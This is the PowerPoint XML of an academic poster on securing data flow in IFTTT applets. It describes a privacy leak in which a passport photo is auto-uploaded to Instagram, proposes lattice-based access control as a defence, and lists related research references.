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0368" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz"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92140C"/>
    <a:srgbClr val="17A398"/>
    <a:srgbClr val="776274"/>
    <a:srgbClr val="EDB183"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FFFF66"/>
    <a:srgbClr val="D16D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9" d="100"/>
          <a:sy n="39" d="100"/>
        </p:scale>
        <p:origin x="108" y="558"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide pos="10368"/>
        <p:guide orient="horz" pos="5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1"/>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1"/>
            <a:ext cx="246888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369951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58779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0"/>
            <a:ext cx="709803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0"/>
            <a:ext cx="2088261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56334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148624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2"/>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2"/>
            <a:ext cx="28392120" cy="3600449"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="5760">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>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263131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0"/>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0"/>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258537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1"/>
            <a:ext cx="2839212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29" y="4034791"/>
            <a:ext cx="13926025"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2267429" y="6012180"/>
            <a:ext cx="13926025"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0" y="4034791"/>
            <a:ext cx="1399460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6664940" y="6012180"/>
            <a:ext cx="13994608"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372226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7199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127872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8"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62729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2369821"/>
            <a:ext cx="1666494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dirty="0"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>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A8855AD0-992B-47EE-8A01-11D1D288F22D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="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08CABC-3B95-4485-9577-6536CF9809DA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284537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1"/>
            <a:ext cx="2839212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0"/>
            <a:ext cx="2839212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A8855AD0-992B-47EE-8A01-11D1D288F22D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/24/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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6308CABC-3B95-4485-9577-6536CF9809DA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94107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loc+" TargetMode="External"/><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455" name="Straight Arrow Connector 454">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55A3139-2BF1-4BF0-BED9-44C8E49DE9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6544593" y="6373091"/>
            <a:ext cx="0" cy="895461"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="98425" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="453" name="Straight Arrow Connector 452">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D99F905-7E7C-4C57-89DD-6CAAA94F633D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2208121" y="6400800"/>
            <a:ext cx="0" cy="881608"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="98425" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="TextBox 446">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EB5C466-1DD6-4AC2-8526-3FFC3D880CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629160" y="6913417"/>
            <a:ext cx="3499495" cy="92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t>event from a service:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>"I'm taking a new photo with my smartphone"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="449" name="Straight Arrow Connector 448">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C3DEA4-B1D0-47C4-8431-A37218618CEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="446" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3768436" y="4544292"/>
            <a:ext cx="526473" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="0C234B"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Flowchart: Direct Access Storage 403">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D190E5BC-BF85-4902-A442-BE8B60E8181A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19147273" flipV="1">
            <a:off x="22036053" y="12546074"/>
            <a:ext cx="770203" cy="366775"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDrum">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="51000">
                <a:schemeClr val="accent2">
                  <a:lumMod val="5000"/>
                  <a:lumOff val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100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utoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7399BBD7-B2E4-4F19-80FB-7CF030A63CA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2074"/>
            <a:ext cx="32918400" cy="1295386"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2358"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D16D63"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT w="165100" prst="coolSlant"/>
            <a:bevelB w="165100" prst="coolSlant"/>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="48228" tIns="24114" rIns="48228" bIns="24114" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="2315366"/>
            <a:endParaRPr lang="en-US" sz="4154" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF06D855-6195-4A25-BC53-B93642452450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4992129" y="172996"/>
            <a:ext cx="25641725" cy="1048973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="48228" tIns="24114" rIns="48228" bIns="24114">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="2315366">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C234B"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Securing dataflow in IFTTT Applets: An Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0C234B"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Box 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{513DD772-8A01-44FD-A616-E61803A9798C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24715694" y="15110878"/>
            <a:ext cx="7960659" cy="1348322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="thinThick">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="32262" tIns="16131" rIns="32262" bIns="16131">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="180247" indent="-180247" algn="l" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DDIFT: Decentralized Dynamic Information Flow Tracking for IoT Privacy and Security by  Nikolaos Sapountzis , Ruimin Sun, Daniela Oliveira.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>If This, Then What? Controlling Flows in IoT Apps by Iulia Bastys , Musard Balliu and Andrei Sabelfeld.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Analyzing the security and privacy risks of IFTTT recipes by Milijana Surbatovich, Jassim Aljuraidan, Lujo Bauer, Anupama Das, Limin Jia.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>JSFlow: Tracking Information Flow in JavaScript and its APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A Principled Approach to Securing IoT Apps by Iulia Bastys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Some Recipes Can Do More Than Spoil Your Appetite: Analyzing the Security and Privacy Risks of IFTTT Recipes by Milijana Surbatovich, Jassim Aljuraidan, Lujo Bauer, Anupam Das and Limin Jia.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD6DC918-71FF-4E65-B522-13C2A0FCB584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8417859" y="6794584"/>
            <a:ext cx="7799294" cy="2020814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="thinThick">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="32262" tIns="16131" rIns="32262" bIns="16131">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Applets can leak private information. Consider the below case. If you take a photo in your phone it gets automatically uploaded to Instagram. The scenario is that you took a picture of your passport which is supposedly to be secure, but the applet triggered an action of uploading it to a public platform as a result confidentiality of the document is lost in this process. Here your private information can be manipulated by the action triggered by the applet.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A08469C-030A-4195-B1C9-33F5998E4BDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="28182127" y="74142"/>
            <a:ext cx="4917668" cy="1125917"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="48228" tIns="24114" rIns="48228" bIns="24114">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="2315366">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C234B"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prathyusha Butti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="2315366">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0C234B"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pbutti@email.arizona.edu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Box 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0484D3F8-5E18-4B76-BF74-B82EEF216110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="161365" y="2608732"/>
            <a:ext cx="7799294" cy="1398492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="48228" tIns="24114" rIns="48228" bIns="24114">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" defTabSz="2315366">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IoT Applets empower users by connecting a variety of otherwise unconnected services.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> The popular IoT app platforms that provide these applets are IFTTT, Zapier, and Microsoft Flow. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" defTabSz="2315366">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IFTTT is  a free web-based service which allow users to easily create new functionality by connecting arbitrary Internet-of-Things (IoT) devices and online services using simple if-then rules, commonly known as applets. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Box 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F73C9611-6B56-4C2A-8F87-65CCE173AA76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24651549" y="2467529"/>
            <a:ext cx="7971016" cy="734308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="thinThick">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="32262" tIns="16131" rIns="32262" bIns="16131">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just" defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Lattice based Access control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> categorizes secrecy and integrity levels of each trigger and action and defines unsafe combinations of levels. We can restrict which applications must share data across them.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Text Box 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68F3ABF8-AD30-44E8-BEF1-45901BFCBC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8471647" y="12543384"/>
            <a:ext cx="7745506" cy="3892095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="thinThick">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="32262" tIns="16131" rIns="32262" bIns="16131">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="323859" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
